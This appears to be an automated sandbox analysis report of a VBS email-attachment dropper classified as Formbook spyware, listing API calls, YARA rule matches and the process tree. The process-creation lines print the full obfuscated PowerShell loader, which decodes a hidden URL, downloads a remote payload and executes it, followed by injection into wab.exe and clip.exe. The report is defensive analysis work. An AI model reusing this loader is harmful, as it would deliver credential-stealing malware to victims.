          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352E80 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352EE0 NtQueueApcThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352FB0 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043539B0 NtGetContextThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352AF0 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352BA0 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04353010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04353D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04353D70 NtOpenThread
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352EA0 NtAdjustPrivilegesToken
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04352B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C7730 NtCreateFile
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C7A20 NtClose
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C7B70 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C7890 NtReadFile
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C7980 NtDeleteFile
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAACCDB8D2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAACCDAB26
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0473E928
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0473F1F8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0473E5E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A87E97
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A87CF7
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A87D67
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A87D77
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A8554E
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A87042
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A86F59
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A93027
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_3_06A84C63
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_224D3FD5
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_224D3FD2
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 18_2_224D9B80
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DF43F
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D2446
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043CE4F6
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D7571
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043BD5B0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E0591
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433C6E0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04320770
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04344750
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DF7B0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431C7C0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D70E9
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DF0E0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043CF0CC
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043270C0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043BA118
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04310100
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430F172
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043EB16B
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0435516C
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043A8158
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432B1B0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E01AA
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D81CC
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043C0274
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043252A0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043C12ED
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433B2C0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D132D
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DA352
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0430D34C
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0436739A
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432E3F0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043E03E6
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04399C32
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04320C00
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043C0CB5
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04310CF2
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DFCF2
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432AD00
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D7D73
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D1D5A
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04323D40
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04338DBF
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431ADE0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433FDC0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DEE26
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04320E59
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04329EB0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04332E90
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DCE93
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DEEDB
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04340F30
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04362F28
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DFF09
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04394F40
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DFFB1
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04321F92
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432CFE0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04312FC8
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0438D800
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04322840
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0432A840
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043068B8
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0434E8F0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043238E0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04336962
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04329950
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433B950
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043229A0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043EA9A6
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04393A6C
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DFA49
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D7A46
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04365AA0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043BDAAC
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0431EA80
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043CDAC6
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DFB76
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043DAB40
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0433FB80
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_04395BF0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_0435DBF9
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_043D6BD7
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021B1300
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021A1128
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021AC710
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021AA790
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021AC4F0
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021AA8D9
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021C9E30
          Source: C:\Windows\SysWOW64\clip.exe | Code function: 22_2_021B2E50
          Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0438EA12 appears 86 times
          Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04355130 appears 36 times
          Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 04367E54 appears 96 times
          Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0439F290 appears 105 times
          Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0430B970 appears 265 times
          Source: IMG-466573885783553Folketingsmedlemmers.vbs | Initial sample: Strings found which are bigger than 50
          Source: amsi32_7668.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@21/8@6/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Metacarpals.Tok
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zssdnvgm.y2n.ps1
          Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6600
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7668
          Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: IMG-466573885783553Folketingsmedlemmers.vbsReversingLabs: Detection: 13%
          Source: IMG-466573885783553Folketingsmedlemmers.vbsVirustotal: Detection: 14%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe; Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: unknown; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: unknown; Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: C:\Windows\SysWOW64\clip.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: unknown; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
